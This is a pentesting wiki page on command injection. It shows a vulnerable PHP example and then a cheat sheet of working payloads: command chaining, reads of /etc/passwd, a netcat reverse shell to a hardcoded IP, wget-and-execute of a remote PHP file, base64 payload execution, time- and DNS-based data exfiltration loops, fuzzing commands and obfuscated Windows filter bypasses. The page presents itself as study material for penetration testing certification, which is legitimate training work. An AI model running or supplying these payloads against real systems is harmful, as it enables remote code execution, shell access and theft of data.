🕵️
VeryLazyTech
📜 Medium🛒 My Shop👾 Github📩 Telegram 📺 YouTube✖ Twitter
  • 🕵️Welcome!
    • VeryLazyTech
    • Support VeryLazyTech
      • 👾 GitHub
      • 📜 Medium
      • ☕ My Shop
      • 📺 YouTube
      • ✖ Twitter
      • 📩 Telegram
  • 🛡️ Vulnerabilities and Exploits
    • CVE - POC
      • Unauthenticated RCE Flaw in Rejetto HTTP File Server - CVE-2024-23692
      • POC - CVE-2024–4956 - Nexus Repository Manager 3 Unauthenticated Path Traversal
      • POC - CVE-2024-45241: Path Traversal in CentralSquare's CryWolf
      • Telerik Auth Bypass CVE-2024-4358
      • Check Point Security Gateways Information Disclosure - CVE-2024-24919
      • CVE-2024-23897 - Jenkins File Read Vulnerability
      • CVE-2024–10914- Command Injection Vulnerability in name parameter for D-Link NAS
      • POC - CVE-2024-21534 Jsonpath-plus vulnerable to Remote Code Execution (RCE)
      • CVE-2024-9935 - PDF Generator Addon for Elementor Page Builder <= 1.7.5 - Unauthenticated Arbitrary
      • CVE-2024-50623- Cleo Unrestricted file upload and download
      • POC - WordPress File Upload plugin, in the wfu_file_downloader.php file before version <= 4.24.11
      • POC - Remote and unauthenticated attacker can send crafted HTTP requests to RCE - cve-2025-3248
      • POC - CVE-2025–2539 File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File
      • POC - CVE-2025-29306 FOXCMS /images/index.html Code Execution Vulnerability
  • 🕵️‍♂️Dorks
    • GitHub Dorks
    • Google Dork Online Tool
  • 📚 Resources
    • Top Hacking Books for 2024: FREE and Paid
    • How to Study for OSCP with the PWK Book PDF
    • Top 20 phishing tools to use in 2024
    • Top 8 Bug Bounty Books for 2025: Must-Reads for Ethical Hackers
    • Top Hacking Tools and Skills You Need to Learn in 2025
    • Offensive Cloud
    • Penetration Testing & Hacking Tools List
    • Top Cybersecurity Books by Topic
  • The Ultimate Penetration Testing Methodology (2025 Edition)
  • 🕸️Pentesting Web
    • Client Side Template Injection (CSTI)
    • Identify a Server’s Origin IP
    • 2FA/MFA/OTP Bypass
  • IDOR
  • Open Redirect
  • Subdomain Takeover
  • Penetration Testing WiFi Networks
  • Client-Side Path Traversal
  • Clickjacking
  • Command Injection
  • JWT Vulnerabilities
  • Bypass rating limit
  • CORS - Misconfigurations & Bypass
  • LDAP Injection
  • File upload vulnerabilities
  • Content Security Policy (CSP) bypass
  • Brute Force - Services, web, local, tools & wordlists
  • 🐧Linux
    • Practical Linux Commands
    • Bypassing Bash Restrictions - Rbash
    • Privilege escalation - Linux
  • Linux Environment Variables
  • 🪟Windows
    • Active Directory Methodology
    • Antivirus (AV) Bypass
  • 🌐Network Pentesting
    • FTP - Port 21
    • SSH- Port 22
    • Telnet - Port 23
    • SMTP/s - Port 25,465,587
    • WHOIS - Port 43
    • TACACS+ - Port 49
    • DNS - Port 53
    • TFTP/Bittorrent-tracker - Port 69/UDP
    • Finger - Port 79
    • Web - Port 80,443
    • Kerberos - Port 88
    • POP - Port 110/995
    • Portmapper - Port 111/TCP/UDP
    • Ident - Port 113
    • NTP - Port 123/UDP
    • MSRPC - Port 135, 539
    • NetBios - Port 137,138,139
    • SMB - Port 139 445
    • IMAP - Port 143, 993
    • SNMP - Ports 161, 162, 10161, and 10162/UDP
    • IRC - Ports 194,6667,6660-7000
    • Check Point Firewall - Port 264
    • LDAP - Ports 389, 636, 3268, 3269
    • IPsec/IKE VPN - Port 500/UDP
    • Modbus - Port 502
    • Rexec - Port 512
    • Rlogin - Port 513
    • Rsh - Port 514
    • Line Printer Daemon (LPD) - Port 515
    • Apple Filing Protocol (AFP) - PORT 548
    • RTSP - Port 554, 8554
    • IPMI - Port 623/UDP/TCP
    • Internet Printing Protocol (IPP) - Port 631
    • EPP - Port 700
    • Rsync - Port 873
    • Rusersd Service - Port 1026
    • Socks - Port 1080
    • Java RMI - RMI-IIOP - Port 1098/1099/1050
    • MSSQL (Microsoft SQL Server) - Port 1433
    • Oracle TNS Listener - Port 1521,1522-1529
  • PPTP - Port 1723
  • MQTT (Message Queuing Telemetry Transport) - Port 1883
  • Compaq HP Insight Manager - Port 2301, 2381
  • NFS Service - Port 2049
  • Docker - Port 2375,2376
  • Squid - Port 3128
  • iScsi - Port 3260
  • SAPRouter - Port 3299
  • 😎Post-exploitation
    • File Transfer Cheatsheet: Windows and Linux
  • 🧑‍🔧Technical guides
    • Kali Linux - Installation
Powered by GitBook
On this page
  • Basic info
  • Command Injection/Execution
  • Filtering bypass

Was this helpful?

Command Injection

  • Become VeryLazyTech member! 🎁

  • Follow us on:

    • ✖ Twitter @VeryLazyTech.

    • 👾 Github @VeryLazyTech.

    • 📜 Medium @VeryLazyTech.

    • 📺 YouTube @VeryLazyTech.

    • 📩 Telegram @VeryLazyTech.

    • 🕵️‍♂️ My Site @VeryLazyTech.

  • Visit our shop for e-books and courses. 📚

Basic info

Command Injection is a critical vulnerability that allows an attacker to execute arbitrary system commands on a server hosting an application. If an application improperly handles user input and passes it to the operating system, an attacker can escape the intended function and execute system commands with the same privileges as the application.

Depending on where your input is being injected you may need to terminate the quoted context (using " or ') before the commands.

🛠️ How Command Injection Works

Applications that interact with the OS (e.g., calling system functions) without properly validating user input can be exploited.

Example: Vulnerable Code (PHP)

<?php
  $user = $_GET['user']; 
  system("ping -c 4 " . $user); 
?>

💡 Problem: The script takes the user parameter and directly appends it to the ping command without validation. 💣 Attack: Inject ; cat /etc/passwd to execute an extra command!

http://target.com/ping.php?user=127.0.0.1;cat /etc/passwd

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command

Limition Bypasses

If you are trying to execute arbitrary commands inside a linux machine you will be interested to read about this Bypasses:

Examples

vuln=127.0.0.1 %0a wget https://web.es/reverse.txt -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay

Parameters

Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities:

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

wfuzz

wfuzz -c -z file,payloads.txt --hc 404 "http://target.com/page?input=FUZZ"

ffuf

ffuf -u "http://target.com/page?input=FUZZ" -w payloads.txt

Time based data exfiltration

Extracting data: char by char

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
real    0m5.007s
user    0m0.000s
sys 0m0.000s

swissky@crashlab▸ ~ ▸ $ time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
real    0m0.002s
user    0m0.000s
sys 0m0.000s

DNS based data exfiltration

Based on the tool from https://github.com/HoLyVieR/dnsbin also hosted at dnsbin.zhack.ca

1. Go to http://dnsbin.zhack.ca/
2. Execute a simple 'ls'
for i in $(ls /) ; do host "$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)

Online tools to check for DNS based data exfiltration:

  • dnsbin.zhack.ca

  • pingb.in

Filtering bypass

Windows

powershell C:**2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:**32\c*?c.e?e # calc

Linux


Learn & practice For the OSCP.

Support VeryLazyTech 🎉
  • Become VeryLazyTech member! 🎁

  • Follow us on:

    • ✖ Twitter @VeryLazyTech.

    • 👾 Github @VeryLazyTech.

    • 📜 Medium @VeryLazyTech.

    • 📺 YouTube @VeryLazyTech.

    • 📩 Telegram @VeryLazyTech.

    • 🕵️‍♂️ My Site @VeryLazyTech.

  • Visit our shop for e-books and courses. 📚

PreviousClickjackingNextJWT Vulnerabilities

Last updated 2 months ago

Was this helpful?

Bypassing Bash Restrictions - Rbash | VeryLazyTech
Bypassing Bash Restrictions - Rbash | VeryLazyTech
Logo
Logo